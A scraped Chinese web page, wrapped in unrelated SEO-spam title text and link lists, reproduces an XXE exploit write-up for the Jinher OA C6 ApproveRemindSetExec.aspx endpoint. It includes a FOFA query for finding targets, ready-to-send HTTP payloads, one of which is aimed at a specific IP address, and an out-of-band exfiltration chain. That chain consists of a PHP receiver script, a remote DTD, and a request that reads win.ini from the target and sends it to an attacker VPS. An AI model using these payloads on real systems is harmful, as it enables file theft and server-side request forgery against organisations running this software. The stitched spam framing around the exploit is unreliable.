当前位置: 首页 > news >正文

怎么在网站上建设投票统计wordpress固定链接显示404

怎么在网站上建设投票统计,wordpress固定链接显示404,成都公司建设网站,化妆品电子商务网站建设策划书0x01 产品描述: 金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制…

0x01 产品描述:

        金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制 Control、中心 Center,而构建了结构化的、灵活集成的、动态响应的、面向企业运营管理的智慧协同应用管理平台。
0x02 漏洞描述:

        金和OA-C6 ApproveRemindSetExec.aspx接口存在XXE漏洞,未经授权的攻击者可利用该漏洞实现任意文件读取或ssrf。
0x03 搜索语句:

Fofa:body="c6/Jhsoft.Web.login"


0x04 漏洞复现:

利用dnslog复现

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://123.0olbin.dnslog.cn"> %remote;]>

 

服务器快速检测: 

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: 61.133.99.56:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-vps:port/test.xml"> %remote;]>

利用dtd获取数据:

整体流程:poc利用个人服务器执行dtd与读取目标服务器的c盘文件内容。

Dtd内容是XXE无回显利用方式,将内容外带到其他地方,将内容通过get.php写入file.txt。

首先在vps上创建以下脚本:

<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

 构造dtd用以读取,dtd里内容如下

<!ENTITY % all "<!ENTITY send SYSTEM 'http://your-vps:port/get.php?file=%file;'>">

构造完成后vps启动服务用于信息监听

请求构造以下数据

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % remote SYSTEM "http://your-vps:port/xxe.dtd">
%remote;
%all;
]>
<root>&send;</root>

 

 获取win.ini数据

解码后

0x05 修复建议:

官方已修复该漏洞,请用户联系厂商修复漏洞:http://www.jinher.com/

http://www.yayakq.cn/news/904226/

相关文章:

  • 新闻资讯建站服务商哪个网站可以做视频片头
  • 深圳网站设计与制作网站建设维护岗位职责
  • 站酷魔方网站建设中直播软件有哪些平台
  • 手机网站建设是什么免费 支付宝购物网站模版
  • 空间怎么做网站大鹏新区住房和建设局网站
  • 雄安建设工程信息网站kali wordpress
  • 营销型网站建设案例分析徐州网站建设培训
  • 网站建设方案华为株洲58同城网站建设电话
  • 网站系统介绍池州网站制作公司
  • 湖北交投建设集团有限公司网站dnf交易网站建设
  • 天津h5模板建站做网站写概要设计
  • 网站开发建设书籍推荐网站制作高手
  • 网站报错500wordpress自定义内容插件
  • 东莞商务网站建设深圳 商城 网站建设
  • 一个网站数据库企业网站建设与管理期末考试
  • asp.net建立网站吗完整的网站建设平台协议书
  • 手机建网站公司网页游戏代码
  • 网站推广岗位的要求安徽建工集团招标信息集采平台
  • 杭州建德网站建设广州知名网站建设公司
  • 扁平化设计网站代码唐山网站建设开发设计公司
  • 大庆市建设中专网站成品网站源码是1688吗
  • 重庆网站建设 制作 设计 优惠价wordpress中文页面打不开
  • 广州正规网站建设有哪些琼海商城网站建设
  • 北京网站建设飞沐中 网站建设 扬州
  • 龙岩网站设计找哪家好莱芜最新新闻
  • 线下推广渠道徐州关键词优化
  • 网站建设 网站推广html5网站开发技术
  • 肇庆cms建站系统怎样做网站排名
  • 建设一个购物网站要多少钱做网站组织结构框架例子
  • 协会网站建站服装店网站模板